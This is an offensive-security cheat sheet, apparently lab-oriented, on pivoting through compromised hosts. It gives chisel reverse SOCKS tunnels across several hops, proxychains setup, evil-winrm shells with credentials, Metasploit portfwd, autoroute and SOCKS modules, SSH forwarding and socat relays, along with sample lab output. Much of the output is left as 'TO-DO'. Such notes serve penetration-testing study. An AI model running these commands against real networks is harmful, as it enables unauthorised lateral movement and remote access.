Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Basic
# Start a local chisel Server
./chisel server --reverse --port 8000
Sample Output:
$ ./chisel server --reverse --port 8000
2024/09/23 12:27:03 server: Reverse tunnelling enabled
2024/09/23 12:27:03 server: Fingerprint ikFn6iQOOodxIlcDQI4dvFu1pdHgV5UnHRenxUg0eho=
2024/09/23 12:27:03 server: Listening on http://0.0.0.0:8000
Ports forwarding
# In target machine
./chisel client <LOCAL_IP>:8000 R:<TARGET_PORT>:127.0.0.1:<TARGET_PORT>
Sample Output:
TO-DO# Mutiple ports fowarding, can be different targets in the same subnet
./chisel client <LOCAL_IP>:8000 R:8080:172.17.0.2:8080 R:5000:172.17.0.3:5000
Sample Output:
TO-DOSocks5
# In target machine
./chisel client <LOCAL_IP>:8000 R:1081:socks
Sample Output:
$ ./chisel client 10.10.14.31:8000 R:1081:socks
2024/09/23 04:16:44 client: Connecting to ws://10.10.14.31:8000
2024/09/23 04:16:44 client: Connected (Latency 47.945673ms)
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 1081
Sample Output:
TO-DO# Example, in our local machine
proxychains4 curl http://172.16.1.100:1081
Sample Output:
TO-DORef: chisel
Multiple subnets
1. Local Kali
./chisel server --reverse --socks5 --port 8000
Sample Output:
TO-DO2. Hop 1
# Start a client
./chisel client <LOCAL_IP>:8000 R:1081:socks &
Sample Output:
TO-DO# Start a server
./chisel server --reverse --socks5 --port 8001 &
Sample Output:
TO-DO# Start a client
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client <LOCAL_IP>:8000 R:1081:socks }
Sample Output:
TO-DO# Start a server
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe server --reverse --socks5 --port 8001 }
Sample Output:
TO-DO# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 1081
Sample Output:
TO-DO3. Hop 2
# Start a client
./chisel client <HOP_1_IP>:8001 R:1082:socks &
Sample Output:
TO-DO# Start a server
./chisel server --reverse --socks5 --port 8002 &
Sample Output:
TO-DO# Start a client
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client <HOP_1_IP>:8001 R:1082:socks }
Sample Output:
TO-DO# Start a server
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe server --reverse --socks5 --port 8002 }
Sample Output:
TO-DO# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 1082
Sample Output:
TO-DO4. Hop 3
# Start a client
./chisel client <HOP_2_IP>:8002 R:1083:socks &
Sample Output:
TO-DO# Start a server
./chisel server --reverse --socks5 --port 8003 &
Sample Output:
TO-DO# Start a client
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client <HOP_2_IP>:8002 R:1083:socks }
Sample Output:
TO-DO# Start a server
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe server --reverse --socks5 --port 8003 }
Sample Output:
TO-DO# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 1083
Sample Output:
TO-DONote: Follow the same pattern for more layers
Example
Local Kali WEB01 LINUX DC01 Windows DC02 Windows <-- TARGET
+------------+ +---------------+ +---------------+ +---------------+
| 10.10.14.1 | | 10.10.110.100 | | 172.16.1.20 | | 172.16.2.5 |
| | --> | | --> | | --> | |
| | | 172.16.1.100 | | 172.16.2.20 | | |
+------------+ +---------------+ +---------------+ +---------------+
Sample Output:
TO-DO1. Local Kali
./chisel server --reverse --socks5 --port 8000
Sample Output:
$ ./chisel server --reverse --socks5 --port 8000
2024/09/29 14:25:33 server: Reverse tunnelling enabled
2024/09/29 14:25:33 server: Fingerprint QFsVZapiOv/hBAKLzj+645y42Sra4IV/Le7G/wgZ4/Y=
2024/09/29 14:25:33 server: Listening on http://0.0.0.0:8000
2024/09/29 14:25:40 server: session#1: tun: proxy#R:127.0.0.1:1081=>socks: Listening
2. WEB01 Linux (Gateway 1)
# Start a client
./chisel client 10.10.14.1:8000 R:1081:socks &
Sample Output:
root@WEB01:/dev/shm# ./chisel client 10.10.14.1:8000 R:1081:socks
2024/09/28 23:31:23 client: Connecting to ws://10.10.14.1:8000
2024/09/28 23:31:26 client: Connected (Latency 312.250392ms)
# Start a server
./chisel server --reverse --socks5 --port 8001 &
Sample Output:
root@WEB01:/dev/shm# ./chisel server --reverse --socks5 --port 8001
2024/09/28 22:54:18 server: Fingerprint BsVmahG6oWbFa26XG4DC8tPiL9nFq2zF3N8jUG5Edwk=
2024/09/28 22:54:18 server: Listening on http://0.0.0.0:8001
2024/09/28 22:56:07 server: session#1: tun: proxy#R:127.0.0.1:1082=>socks: Listening
3. DC01 Windows (Gateway 2)
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 1081
Sample Output:
TO-DOproxychains4 evil-winrm -i 172.16.1.20 -u user -p password
Sample Output:
$ proxychains4 evil-winrm -i 172.16.1.20 -u user -p password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1081 ... 172.16.1.20:5985 ... OK
*Evil-WinRM* PS C:\Users\user\Documents>
.\chisel.exe client 172.16.1.100:8001 R:1082:socks
Sample Output:
*Evil-WinRM* PS C:\Users\user\Documents>.\chisel.exe client 172.16.1.100:8001 R:1082:socks
2024/09/29 07:41:35 client: Connecting to ws://172.16.1.100:8001
2024/09/29 07:41:35 client: Connected (Latency 0s)
# Or run in background
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client 172.16.1.100:8001 R:1082:socks }
Sample Output:
TO-DO4. Local Kali
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 1082
Sample Output:
TO-DOproxychains4 evil-winrm -i 172.16.2.5 -u user -p password
Sample Output:
$ proxychains4 evil-winrm -i 172.16.2.5 -u user -p password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1081 ... 127.0.0.1:1082 ... 172.16.2.5:5985 ... OK
*Evil-WinRM* PS C:\Users\user\Documents>
Note: Edit /etc/proxychains4.conf accordingly, depends on which layer you are accessing
Ports forwarding
# Add
portfwd add -l <TARGET_PORT> -r <TARGET> -p <TARGET_PORT>
Sample Output:
meterpreter > portfwd add -l 88 -r 172.16.2.5 -p 88
[*] Forward TCP relay created: (local) :88 -> (remote) 172.16.2.5:88
# Delete
portfwd delete -l <TARGET_PORT> -r <TARGET> -p <TARGET_PORT>
Sample Output:
TO-DOAdd routes
# Enter target session
sessions <SESSION_ID>
Sample Output:
msf6 post(multi/manage/autoroute) > sessions 1
[*] Starting interaction with 1...
# Return from meterpreter
background
Sample Output:
meterpreter > background
[*] Backgrounding session 1...
use post/multi/manage/autoroute
Sample Output:
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) >
set session <SESSION_ID>
Sample Output:
msf6 post(multi/manage/autoroute) > set session 1
session => 1
# Manual add [optional]
set cmd add
Sample Output:
msf6 post(multi/manage/autoroute) > set cmd add
cmd => add
# Manual set subnet [optional]
set subnet <SUBNET>
Sample Output:
msf6 post(multi/manage/autoroute) > set subnet 172.16.1.0
subnet => 172.16.1.0
# Manual set mask [optional]
set netmask <MASK>
Sample Output:
msf6 post(multi/manage/autoroute) > set netmask 255.255.255.0
netmask => 255.255.255.0
run
Sample Output:
msf6 post(multi/manage/autoroute) > run
[*] Running module against 172.16.1.100
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.1.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
# Manual add route
route add <SUBNET> <MASK> <SESSION_ID>
Sample Output:
TO-DO# Check
route
Sample Output:
msf6 post(multi/manage/autoroute) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.16.1.0 255.255.255.0 Session 2
172.16.2.0 255.255.255.0 Session 1
# Check route to target
route get <TARGET>
Sample Output:
msf6 auxiliary(server/socks_proxy) > route get 172.16.2.1
172.16.2.1 routes through: Session 1
# Remove route
route remove <SUBNET>/<MASK> <SESSION_ID>
Sample Output:
TO-DO# Remove all routes
route flush
Sample Output:
TO-DOSocks5
use auxiliary/server/socks_proxy
Sample Output:
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) >
# Set socks port [optional]
set SRVPORT <SOCKS_PORT>
Sample Output:
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1081
SRVPORT => 1081
run
Sample Output:
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server <----- Press Enter
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO# Add to the end of the file
socks5 127.0.0.1 <SOCKS_PORT>
Sample Output:
TO-DO# Example, in our local machine
proxychains4 curl http://172.16.1.100:1081
Sample Output:
TO-DO# SSH port forwarding without spawning a shell
sshpass -p '<PASSWORD>' ssh -N -L <TARGET_PORT>:127.0.0.1:<TARGET_PORT> <USER>@<TARGET>
Sample Output:
$ ssh -N -L 5985:127.0.0.1:5985 3v4Si0N@10.10.10.240
3v4Si0N@10.10.10.240's password:
# SSH socks5 tunneling without spawning a shell
sshpass -p '<PASSWORD>' ssh -N -D 1081 <USER>@<TARGET>
Sample Output:
$ ssh -i id_rsa -N -D 1081 root@10.10.11.179
# Any traffic go to port <TARGET_PORT> will be forwarded to <LOCAL_IP>:<TARGET_PORT>
./socat tcp-listen:<TARGET_PORT>,fork tcp:<LOCAL_IP>:<TARGET_PORT> &
Sample Output:
TO-DOsocks5 start
Sample Output:
TO-DO